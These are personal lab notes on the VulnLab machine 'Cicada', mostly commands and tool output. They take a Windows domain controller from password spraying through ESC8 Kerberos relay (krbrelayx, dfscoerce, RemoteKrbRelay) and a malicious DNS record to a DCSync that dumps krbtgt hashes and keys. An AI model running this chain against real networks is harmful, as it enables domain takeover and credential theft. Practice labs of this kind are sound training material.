Cicada

This is not a writeup, just my notes about VulnLabs machines.

Operating System: Windows Server 2022 Standard

Chain: False

Credentials

Username	Password	Method	Scope
Rosie.Powell	Cicada123	Password Spraying + Kerberos	Domain User

✅ Valid Usernames

Daniel.Marshall
Debra.Wright
Jane.Carter
Jordan.Francis
Joyce.Andrews
Katie.Ward
Megan.Simpson
Richard.Gibbons
Rosie.Powell
Shirley.West

🔑 Passwords list

Cicada123

Information Gathering

Nmap Scan

# Nmap 7.94SVN scan initiated Wed Apr  9 17:10:36 2025 as: nmap -sS -Pn -n -p- -T5 --open -A -oN ext_tcp_cicada_10.10.123.255 -vvv 10.10.123.255
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-09 21:17:07Z)
111/tcp   open  rpcbind       syn-ack ttl 127 2-4 (RPC #100000)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
2049/tcp  open  nlockmgr      syn-ack ttl 127 1-4 (RPC #100021)
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49203/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49672/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
65409/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
65447/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
65465/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Initial enumeration

DNS

• Not vulnerable to DNS Zone Transfer.

SMB (enum4linux-ng)

• Domain: cicada.vl

• FQDN: DC-JPQ225.cicada.vl

NFS

❯ showmount -e 10.10.123.255
Export list for 10.10.123.255:
/profiles (everyone)
❯ mkdir profiles 
❯ sudo mount -t nfs 10.10.123.255:/profiles profiles -o nolock

Inside the profiles directory there a folders with possible usernames and two images one containing a possible password

User brute forcing

STATUS_NOT_SUPPORTED: NTLM authentication is disabled; instead, Kerberos authentication is used.

When NTLM is disabled and Kerberos is enable you must specify FQDN not IP Address

nxc smb 10.10.123.255 -u users.txt -p 'Cicada123'
SMB         10.10.123.255   445    10.10.123.255    [*]  x64 (name:10.10.123.255) (domain:10.10.123.255) (signing:True) (SMBv1:False)
SMB         10.10.123.255   445    10.10.123.255    [-] 10.10.123.255\Administrator:Cicada123 STATUS_NOT_SUPPORTED
...
...

Bruforcing with Kerberos authentication

❯ nxc smb DC-JPQ225.cicada.vl -u users.txt -p 'Cicada123' -k
<SNIF>
SMB         DC-JPQ225.cicada.vl 445    DC-JPQ225        [+] cicada.vl\Rosie.Powell:Cicada123 

Requesting a TGT ticket

❯ impacket-getTGT cicada.vl/Rosie.Powell:'Cicada123' -dc-ip 10.10.123.255 -k
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in Rosie.Powell.ccache
❯ export KRB5CCNAME='~/Documents/Cicada/Content/Rosie.Powell.ccache'

Discovering Vulnerable Certificate Templates (ESC8)

❯ certipy-ad find -k -no-pass -vulnerable -stdout -ns 10.10.123.255 -dc-ip DC-JPQ225.cicada.vl
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'cicada-DC-JPQ225-CA' via CSRA
[!] Got error while trying to get CA configuration for 'cicada-DC-JPQ225-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'cicada-DC-JPQ225-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'cicada-DC-JPQ225-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : cicada-DC-JPQ225-CA
    DNS Name                            : DC-JPQ225.cicada.vl
    Certificate Subject                 : CN=cicada-DC-JPQ225-CA, DC=cicada, DC=vl
    Certificate Serial Number           : 7AB6BA064BFB22904C868758AF2017D2
    Certificate Validity Start          : 2025-04-09 21:05:46+00:00
    Certificate Validity End            : 2525-04-09 21:15:46+00:00
    Web Enrollment                      : Enabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : CICADA.VL\Administrators
      Access Rights
        ManageCertificates              : CICADA.VL\Administrators
                                          CICADA.VL\Domain Admins
                                          CICADA.VL\Enterprise Admins
        ManageCa                        : CICADA.VL\Administrators
                                          CICADA.VL\Domain Admins
                                          CICADA.VL\Enterprise Admins
        Enroll                          : CICADA.VL\Authenticated Users
    [!] Vulnerabilities
      ESC8                              : Web Enrollment is enabled and Request Disposition is set to Issue
Certificate Templates                   : [!] Could not find any certificate templates

Compromise Domain Controller from Linux

Adding Malicious DNS Record

#Adding DNS using dnstool
python3 dnstool.py -k -u 'cicada.vl\Rosie.Powell' -p 'Cicada123' -r 'dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' -d 10.8.5.48 -a add DC-JPQ225.cicada.vl -dns-ip 10.10.72.89
#Adding DNS usig bloodyAD
bloodyAD -k --host DC-JPQ225.cicada.vl -d cicada.vl -u Rosie.Powell -p 'Cicada123' add dnsRecord 'dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' 10.8.5.48

Setting Up krbrelayx Environment

❯ git clone https://github.com/dirkjanm/krbrelayx.git
❯ cd krbrelayx
❯ python3 -m venv env
❯ source env/bin/activate

Launching krbrelayx Attack

Format: HOSTNAME1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA

python krbrelayx.py -t 'http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp' --adcs --template DomainController -v 'DC-JPQ225$' 2>/dev/null
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMB loaded..
[*] Running in attack mode to single host
[*] Running in kerberos relay mode because no credentials were specified.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80

[*] Setting up DNS Server
[*] Servers started, waiting for connections

Triggering Coercion via DFS

❯ KRB5CCNAME='Rosie.Powell.ccache' python3 dfscoerce.py -k -no-pass 'dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' dc-jpq225.cicada.vl

#Output generated from previous krbrelayx.py and dfscoerce.py steps.
[*] SMBD: Received connection from 10.10.123.255
[*] HTTP server returned status code 200, treating as a successful login
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] SMBD: Received connection from 10.10.123.255
[*] HTTP server returned status code 200, treating as a successful login
[*] Skipping user DC-JPQ225$ since attack was already performed
[*] GOT CERTIFICATE! ID 15
[*] Writing PKCS#12 certificate to ./DC-JPQ225$.pfx
[*] Certificate successfully written to file

Path: Certipy-ad tool

Retrieving domain controller NT Hash

❯ certipy-ad auth -username 'DC-JPQ225$' -pfx DC-JPQ225\$.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: dc-jpq225$@cicada.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'dc-jpq225.ccache'
[*] Trying to retrieve NT hash for 'dc-jpq225$'
[*] Got hash for 'dc-jpq225$@cicada.vl': aad3b435b51404eeaad3b435b51404ee:630c1dcb6759aa4a11e64602f4d7c45f

Requesting domain controller Ticket Granting Ticket

❯ impacket-getTGT cicada.vl/'dc-jpq225$' -hashes 'aad3b435b51404eeaad3b435b51404ee:630c1dcb6759aa4a11e64602f4d7c45f'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in dc-jpq225$.ccache

Performing DCSync Attack against domain controller

❯ KRB5CCNAME='dc-jpq225$.ccache' impacket-secretsdump -k -no-pass dc-jpq225.cicada.vl -dc-ip 10.10.72.89 -just-dc-user krbtgt
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8dd165a43fcb66d6a0e2924bb67e040c:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:ed5b82d607535668e59aa8deb651be5abb9f1da0d31fa81fd24f9890ac84693d
krbtgt:aes128-cts-hmac-sha1-96:9b7825f024f21e22e198e4aed70ff8ea
krbtgt:des-cbc-md5:2a768a9e2c983e31
[*] Cleaning up... 

Path: PKINITtools tools

Requesting TGT Using PKINIT and PFX Certificate

Use a python environment and install the requirements

❯ python gettgtpkinit.py -cert-pfx ../krbrelayx/DC-JPQ225\$.pfx 'cicada.vl/DC-JPQ225$' dc.ccache
2025-04-14 00:20:51,783 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-04-14 00:20:52,087 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
2025-04-14 00:20:52,443 minikerberos INFO     AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-04-14 00:20:52,443 minikerberos INFO     5ef899aa9751b0343c82c19152c592e95a24b1ce56fd0fc3ef9596a77f1b1d47
INFO:minikerberos:5ef899aa9751b0343c82c19152c592e95a24b1ce56fd0fc3ef9596a77f1b1d47
2025-04-14 00:20:52,445 minikerberos INFO     Saved TGT to file
INFO:minikerberos:Saved TGT to file

Dumping Domain Secrets with secretsdump

❯ KRB5CCNAME='dc.ccache' impacket-secretsdump -k -no-pass dc-jpq225.cicada.vl -just-dc-user krbtgt
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8dd165a43fcb66d6a0e2924bb67e040c:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:ed5b82d607535668e59aa8deb651be5abb9f1da0d31fa81fd24f9890ac84693d
krbtgt:aes128-cts-hmac-sha1-96:9b7825f024f21e22e198e4aed70ff8ea
krbtgt:des-cbc-md5:2a768a9e2c983e31
[*] Cleaning up... 

Compromise Domain Controller from Windows

Setting up DNS

Joining to the domain controller.

Launching RemoteKrbRelay attack

PS C:\Temp> RemoteKrbRelay.exe -adcs -template DomainController -victim dc-jpq225.cicada.vl -target dc-jpq225.cicada.vl -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3

                            /\_/\____,
                  ,___/\_/\ \  ~     /
                  \     ~  \ )   XXX
                    XXX     /    /\_/\___,
                       \o-o/-o-o/   ~    /
                        ) /     \    XXX
                       _|    / \ \_/
                    ,-/   _  \_/   \
                   / (   /____,__|  )
                  (  |_ (    )  \) _|
                 _/ _)   \   \__/   (_
                (,-(,(,(,/      \,),),)

                CICADA8 Research Team
                From Michael Zhmaylo (MzHmO)
[+] Setting UP Rogue COM at port 12345
[+] Registering...
[+] Register success
[+] Forcing Authentication
[+] Using CLSID: d99e6e74-fc88-11d0-b498-00a0c90312f3
[*] apReq: 6082071f06...
[+] Got Krb Auth from NT/System. Relaying to ADCS now...
[*] AcceptSecurityContext: SEC_I_CONTINUE_NEEDED
[*] fContextReq: Delegate, MutualAuth, ReplayDetect, SequenceDetect, Confidentiality, UseDceStyle, Connection
[+] Received Kerberos Auth from dc-jpq225.cicada.vl with ticket on http/dc-jpq225.cicada.vl
[*] apRep2: 6f5b305...
[+] HTTP session established
[+] Cookie ASPSESSIONIDSSDRDQTA=IHPNGIODCGPMFFNKEE...; path=/
[+] Lets get certificate for "cicada.vl\dc-jpq225$" using "DomainController" template
[+] Success (ReqID: 17)

Writting the base64 string into a file.

echo -ne "MIIC8DCCAdigAwIBAgI<SNIF>" | base64 -d > cert.p12

Obtaining Domain Controller NT Hash

certipy auth -pfx cert.p12 -dc-ip 10.10.104.125 -domain cicada.vl
export KRB5CCNAME=dc-jpq225.ccache

[*] Using principal: dc-jpq225$@cicada.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'dc-jpq225.ccache'
[*] Trying to retrieve NT hash for 'dc-jpq225$'
[*] Got hash for 'dc-jpq225$@cicada.vl': aad3b435b51404eeaad3b435b51404ee:630c1dcb6759aa4a11e64602f4d7c45f

Performing DCSync Attack against Domain Controller.

❯ KRB5CCNAME='dc-jpq225$.ccache' impacket-secretsdump -k -no-pass dc-jpq225.cicada.vl -dc-ip 10.10.72.89 -just-dc-user krbtgt
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8dd165a43fcb66d6a0e2924bb67e040c:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:ed5b82d607535668e59aa8deb651be5abb9f1da0d31fa81fd24f9890ac84693d
krbtgt:aes128-cts-hmac-sha1-96:9b7825f024f21e22e198e4aed70ff8ea
krbtgt:des-cbc-md5:2a768a9e2c983e31